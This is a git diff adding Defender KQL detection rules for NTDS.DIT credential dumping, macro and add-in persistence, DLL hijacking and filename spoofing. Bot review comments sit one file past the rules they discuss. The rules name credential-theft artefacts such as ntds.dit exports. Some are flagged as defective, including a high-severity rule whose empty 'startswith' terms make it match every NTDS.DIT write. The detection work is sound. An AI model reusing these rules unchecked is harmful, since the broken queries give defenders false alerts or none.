+// - User genuinely creates a VB Macro for their email
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_created.kql b/KQL/rules/windows/file/file_event/ntds_dit_created.kql
new file mode 100644
index 00000000..8340ad4a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_dit_created.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: low
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..4fe8fd8c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..af5c1e7b
--- /dev/null
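Review bot: The `where` clause of `ntds_dit_creation_by_uncommon_parent_process.kql` ends in four `InitiatingProcessParentFileName startswith ""` terms, which reads as a conversion artefact: some upstream values were emitted as empty strings instead of being mapped or dropped. As far as I can tell an empty right-hand side of `startswith` in KQL is true for every non-null value (please confirm in the query editor), in which case this `Level: high` rule silently degrades to `FolderPath endswith "\\ntds.dit"` and fires on every NTDS.DIT write, duplicating the `Level: low` `ntds_dit_created.kql` rule earlier on the same line at high severity; if the engine instead treated the term as false, the rule would be missing whichever parent conditions the upstream rule carries, so the output is wrong either way. The tail of the clause should be reduced to `... or InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat"))` until the lost values are recovered from the upstream rule, and the conversion step should refuse to emit a rule in which any string operator receives an empty pattern, so this class of defect fails the workflow run instead of reaching a PR.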
+++ b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Process
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
new file mode 100644
index 00000000..5bad4655
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
@@ -0,0 +1,10 @@
+// Title: NTDS Exfiltration Filename Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
new file mode 100644
index 00000000..ac84e02e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
@@ -0,0 +1,10 @@
+// Title: Octopus Scanner Malware
+// Author: NVISO
+// Date: 2020-06-09
+// Level: high
+// Description: Detects Octopus Scanner Malware.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1195, attack.t1195.001
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_creation.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql
new file mode 100644
index 00000000..baaec717
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Office Macro File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the systems
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Very common in environments that rely heavily on macro documents
+
+DeviceFileEvents
+| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
new file mode 100644
index 00000000..9640ab1d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
@@ -0,0 +1,10 @@
+// Title: Office Macro File Creation From Suspicious Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: high
+// Description: Detects the creation of a office macro file from a a suspicious process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_download.kql b/KQL/rules/windows/file/file_event/office_macro_file_download.kql
new file mode 100644
index 00000000..8ffca814
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_download.kql
@@ -0,0 +1,14 @@
+// Title: Office Macro File Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client).
+// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Legitimate macro files downloaded from the internet
+// - Legitimate macro files sent as attachments via emails
+
+DeviceFileEvents
+| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..a10c127d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: OneNote Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".one" or ".onepkg" files from those locations
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
new file mode 100644
index 00000000..b3dc4af7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Temp Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes creating temp files related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
new file mode 100644
index 00000000..310bd1a4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
@@ -0,0 +1,13 @@
+// Title: PDF File Created By RegEdit.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-08
+// Level: high
+// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
+// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
new file mode 100644
index 00000000..0b8e07fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Or Script Dropper Via PowerShell
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-17
+// Level: medium
+// Description: Detects PowerShell creating a binary executable or a script file.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
new file mode 100644
index 00000000..1d16c985
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
new file mode 100644
index 00000000..3b9e8ffa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
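Review bot: `InitiatingProcessFolderPath =~ "System"` compares a folder-path column against a bare process name; for the kernel's System pseudo-process DeviceFileEvents carries the name in `InitiatingProcessFileName`, and whether `InitiatingProcessFolderPath` holds the same literal (rather than being empty) is not something this hunk establishes — if it is empty, this critical-level rule never fires. The same comparison appears as an exclusion in the Potential Webshell Creation On Static Website rule later in this chunk, where a non-matching literal would silently widen the detection instead of disabling it. Suggest `InitiatingProcessFileName =~ "System"` in both places, verified against a few live rows for the System process.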
@@ -0,0 +1,12 @@
+// Title: Potential File Extension Spoofing Using Right-to-Left Override
+// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-11-17
+// Level: high
+// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.002
+// False Positives:
+// - Filenames that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceFileEvents
+| where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains "xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
new file mode 100644
index 00000000..088e87ae
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
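Review bot: `FolderPath contains "\\u202e"` searches for the six literal characters backslash, u, 2, 0, 2, e — in a KQL double-quoted string `\\` is an escaped backslash, not a Unicode escape — and `"[U+202E]"` for a bracketed rendering, so neither clause matches a filename that contains the actual U+202E code point unless the sensor already serialises it one of those ways. Add a clause for the real character, `FolderPath contains unicode_codepoints_to_string(8238)` (8238 is 0x202E), or confirm from sample DeviceFileEvents rows which rendering the sensor emits and keep that one. As it stands the high-level rule most likely depends on an escaping convention the page does not show.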
@@ -0,0 +1,12 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
+// Author: Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
new file mode 100644
index 00000000..eda4034a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
@@ -0,0 +1,14 @@
+// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceFileEvents
+| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
new file mode 100644
index 00000000..1337b527
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
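Review bot: KQL `contains` is case-insensitive, so the second `or` group of upper-case Cyrillic and Greek letters largely duplicates the first group as far as matching goes (assuming the engine's case folding covers those scripts, which is worth confirming on a sample), and the resulting chain of roughly fifty `contains` terms is evaluated against every file event. A single `matches regex` with one character class built from the same letters, or `contains_cs` if the two case groups are meant to be distinct, would state the intent in one term and is cheaper to evaluate. The `where` line is split across two physical lines in this rendering; the rule itself is one statement.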
@@ -0,0 +1,10 @@
+// Title: Potential Initial Access via DLL Search Order Hijacking
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
new file mode 100644
index 00000000..665e7534
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Attempt Via ErrorHandler.Cmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: medium
+// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
+// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
new file mode 100644
index 00000000..2730248f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Microsoft Office Add-In
+// Author: NVISO
+// Date: 2020-05-11
+// Level: high
+// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+// False Positives:
+// - Legitimate add-ins
+
+DeviceFileEvents
+| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
new file mode 100644
index 00000000..ec09b020
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
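Review bot: The third branch, `FolderPath contains "Microsoft\\Excel\\XLSTART\\"`, is the only path fragment in the `where` line without a leading backslash, so it also matches a directory whose name merely ends in `Microsoft`. The effect on the detection is negligible, but `"\\Microsoft\\Excel\\XLSTART\\"` keeps the four fragments uniform and makes the intent (a directory named exactly `Microsoft`) explicit.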
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Microsoft Office Startup Folder
+// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Loading a user environment from a backup or a domain controller
+// - Synchronization of templates
+
+DeviceFileEvents
+| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
new file mode 100644
index 00000000..7350a916
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Notepad++ Plugins
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Possible FPs during first installation of Notepad++
+// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
+
+DeviceFileEvents
+| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
new file mode 100644
